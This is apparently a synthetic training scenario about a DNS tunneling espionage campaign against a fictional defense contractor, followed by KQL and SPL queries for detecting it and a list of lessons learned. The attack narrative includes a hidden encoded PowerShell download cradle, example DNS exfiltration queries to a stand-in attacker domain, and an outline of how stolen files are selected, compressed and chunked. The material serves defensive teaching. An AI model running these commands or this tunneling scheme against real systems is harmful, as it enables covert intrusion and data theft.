SC-042: DNS Tunneling Exfiltration¶

Threat Actor Profile¶

SILENT CHANNEL is a synthetic nation-state espionage group that specializes in leveraging DNS as a covert communication channel for command-and-control and data exfiltration. The group targets defense contractors, government agencies, and critical research institutions, focusing on intellectual property theft related to defense programs, advanced weapons systems, and classified research.

SILENT CHANNEL's signature tradecraft is the use of DNS tunneling as their primary C2 and exfiltration mechanism. They operate custom DNS tunneling software that encodes data into DNS query names (subdomains of attacker-controlled domains) and receives commands via DNS TXT, CNAME, and MX record responses. This technique exploits the fact that DNS is almost universally allowed through firewalls and is rarely inspected at the content level.

The group operates their own authoritative DNS servers for attacker-controlled domains, allowing them to receive any DNS query directed at those domains and respond with arbitrary data encoded in DNS records.

Motivation: Strategic intelligence collection — theft of defense program specifications, technical drawings, classified research, and communications of senior leadership.

Scenario Narrative¶

Phase 1 — Initial Access via Spear Phishing (~30 min)¶

Orion Defense Analytics (ODA) is a synthetic defense contractor with 1,200 employees specializing in radar systems and electronic warfare. ODA holds multiple classified contracts and operates a segmented network with separate enclaves for unclassified (CUI), Secret, and Top Secret work. The unclassified network connects to the internet; classified enclaves are air-gapped.

SILENT CHANNEL targets ODA's unclassified corporate network, which contains CUI (Controlled Unclassified Information) including technical proposals, contract details, personnel records, and unclassified engineering data. While not classified, this data has significant intelligence value.

The attack begins with a spear phishing email targeting Dr. Sarah Kim, a senior radar systems engineer:

Subject: "DARPA BAA-2026-015 — Next-Gen AESA Radar Research Solicitation" Sender: solicitations@darpa-baa.example.com Attachment: DARPA_BAA_2026_015_AESA_Radar.pdf (PDF with embedded JavaScript)

The PDF exploits a vulnerability in the target's PDF reader to execute a PowerShell download cradle that retrieves the DNS tunneling implant from 198.51.100.75:

# Synthetic — educational representation of download cradle
# DO NOT use in any real environment
powershell -nop -w hidden -enc [Base64EncodedPayload]
# Decoded payload downloads and executes DNS tunnel agent
# from 198.51.100.75/update.bin

The implant, dubbed SilentDNS, is a custom DNS tunneling client written in C that:

• Encodes C2 commands and data in DNS queries to *.data.updates-cdn.example.com
• Receives commands via DNS TXT record responses from the attacker's authoritative DNS server (203.0.113.100)
• Uses base32 encoding in subdomain labels (max 63 chars per label, 253 chars total per query)
• Queries are sent to the organization's internal DNS resolver, which forwards to recursive resolvers, which ultimately query the attacker's authoritative server
• Beacon interval: randomized 30–90 seconds

Evidence Artifacts:

Phase 2 — DNS Tunneling C2 & Internal Reconnaissance (~40 min)¶

SilentDNS establishes a reliable C2 channel over DNS. The communication protocol operates as follows:

# Synthetic example — educational only
GEZDGNBVGY3TQOJQ.data.updates-cdn.example.com  →  TXT query
│                  │
└─ base32-encoded  └─ attacker-controlled domain
   data payload

# Synthetic example — educational only
TXT "GEZDGNBVGY3TQOJQGE2DSNRXHA3DOOBZ"
│
└─ base32-encoded command payload
   (e.g., "dir C:\Users\s.kim\Documents")

10:18:01  ODA-ENG-SKIM → DNS → GEZDGNBV.data.updates-cdn.example.com  TXT
10:18:45  ODA-ENG-SKIM → DNS → GY3TQOJQ.data.updates-cdn.example.com  TXT
10:19:33  ODA-ENG-SKIM → DNS → GEZDONBV.data.updates-cdn.example.com  TXT
10:20:21  ODA-ENG-SKIM → DNS → HA3DOOBZ.data.updates-cdn.example.com  TXT
...
(continuous, 30-90 second intervals, 24/7)

Using the DNS tunnel, SILENT CHANNEL conducts internal reconnaissance over 14 days:

Evidence Artifacts:

Phase 3 — Data Staging & DNS Exfiltration (~35 min)¶

After 14 days of reconnaissance, SILENT CHANNEL has identified the high-value targets:

• \\oda-fs01.oda.example\proposals$\DARPA-AESA-2026\ — 2.8GB of radar system technical proposals
• \\oda-fs01.oda.example\engineering$\EW-CounterMeasures\ — 1.4GB of electronic warfare specifications
• \\oda-fs01.oda.example\contracts$\DoD-FA8721\ — 890MB of contract documents and performance reports

Total target data: 5.1GB. At the DNS tunnel's throughput of ~400KB/day, exfiltrating all data would take approximately 35 years. SILENT CHANNEL employs two optimization strategies:

1. Selective targeting: Reduce the dataset to the most valuable 120MB through keyword search and file type filtering (.docx, .pdf, .xlsx, .pptx containing keywords: "AESA", "radar", "frequency hopping", "electronic warfare", "jamming", "counter-countermeasure")
2. Compression and chunking: Compress the 120MB dataset to 38MB using LZMA compression, then split into 253-byte DNS-compatible chunks (approximately 150,000 DNS queries to exfiltrate)

The exfiltration runs over 21 days at an elevated beacon rate (1 query per 5–15 seconds during business hours only — to blend with normal DNS traffic volume):

# Synthetic exfiltration DNS queries — educational only
GEZDGNBV.GY3TQOJQ.GEZDSNRX.c001.exfil.updates-cdn.example.com  TXT
│         │         │         │
└─────────┴─────────┴─ data  └─ chunk counter
   (base32-encoded compressed file data)

Evidence Artifacts:

Detection & Hunting¶

KQL Detection Queries¶

// Detect DNS tunneling — high query volume to single domain with high entropy subdomains
DnsEvents
| where TimeGenerated > ago(24h)
| extend SubDomain = tostring(split(Name, ".")[0])
| extend DomainBase = strcat(tostring(split(Name, ".")[-2]), ".", tostring(split(Name, ".")[-1]))
| extend SubDomainLength = strlen(SubDomain)
| summarize QueryCount = count(),
            AvgSubDomainLength = avg(SubDomainLength),
            MaxSubDomainLength = max(SubDomainLength),
            UniqueSubDomains = dcount(SubDomain),
            SourceHosts = dcount(Computer)
  by DomainBase
| where QueryCount > 500
    and AvgSubDomainLength > 20
    and UniqueSubDomains > 100
    and SourceHosts <= 3
| sort by QueryCount desc

// Detect DNS TXT query anomaly — TXT queries are rare in normal traffic
DnsEvents
| where TimeGenerated > ago(24h)
| where QueryType == "TXT"
| summarize TXTQueries = count(), UniqueDomains = dcount(Name) by Computer
| where TXTQueries > 100
| sort by TXTQueries desc

// Detect DNS beaconing — regular interval queries to a single domain
DnsEvents
| where TimeGenerated > ago(7d)
| where Name contains "updates-cdn.example.com"
| sort by TimeGenerated asc
| extend NextQuery = next(TimeGenerated)
| extend IntervalSeconds = datetime_diff('second', NextQuery, TimeGenerated)
| summarize AvgInterval = avg(IntervalSeconds),
            StdevInterval = stdev(IntervalSeconds),
            MinInterval = min(IntervalSeconds),
            MaxInterval = max(IntervalSeconds),
            QueryCount = count()
  by Computer
| extend Jitter = StdevInterval / AvgInterval
| where Jitter < 0.5 and QueryCount > 100

SPL Detection Queries¶

// Detect DNS tunneling — high entropy subdomain queries
index=dns sourcetype=dns
| eval subdomain=mvindex(split(query, "."), 0)
| eval subdomain_len=len(subdomain)
| eval base_domain=mvindex(split(query, "."), -2) . "." . mvindex(split(query, "."), -1)
| stats count as query_count, avg(subdomain_len) as avg_len, dc(subdomain) as unique_subs, dc(src_ip) as source_hosts by base_domain
| where query_count > 500 AND avg_len > 20 AND unique_subs > 100 AND source_hosts <= 3
| sort -query_count

// Detect DNS beaconing pattern
index=dns sourcetype=dns query="*updates-cdn.example.com"
| sort _time
| streamstats current=f last(_time) as prev_time by src_ip
| eval interval=_time - prev_time
| stats count, avg(interval) as avg_interval, stdev(interval) as stdev_interval by src_ip
| eval jitter_ratio = stdev_interval / avg_interval
| where jitter_ratio < 0.5 AND count > 100
| table src_ip, count, avg_interval, stdev_interval, jitter_ratio

// Detect anomalous TXT query volume per host
index=dns sourcetype=dns record_type=TXT
| stats count as txt_queries, dc(query) as unique_domains by src_ip
| where txt_queries > 100
| sort -txt_queries

Indicators of Compromise (IOCs)¶

Full Attack Timeline¶

Lessons Learned¶

Critical Failures¶

1. No DNS inspection or logging: ODA had no visibility into DNS query content. DNS is the most commonly allowed protocol through firewalls, yet it was completely unmonitored. The attacker operated undetected for 36 days.

2. EDR in detect-only mode: The EDR detected the initial exploit chain (AcroRd32.exe → cmd.exe → powershell.exe) but did not block it. Detect-only mode for high-confidence exploit chains leaves a window for attackers to establish persistence before analysts respond.

3. Mimikatz alert dismissed: An L1 analyst dismissed a Mimikatz detection as "testing activity." High-fidelity credential theft alerts must be treated as critical incidents with mandatory escalation to L2/L3 regardless of the analyst's initial assessment.

4. No outbound DNS restrictions: All internal hosts could query any external domain via the internal DNS resolver. DNS allowlisting or DNS security solutions (DNS firewalls, RPZ, protective DNS) would have blocked queries to the attacker-controlled domain.

5. Flat network east-west visibility: Lateral movement via PsExec between engineering workstations was not detected because there was no east-west network monitoring or microsegmentation.

Recommended Controls¶

Cross-References¶

• Chapter 31: Network Security Architecture — DNS security, network monitoring, and protocol inspection
• Chapter 31: Network Security Architecture — Network segmentation, DNS architecture, and covert channel detection
• Chapter 38: Threat Hunting Advanced — DNS analytics, entropy analysis, and beaconing detection techniques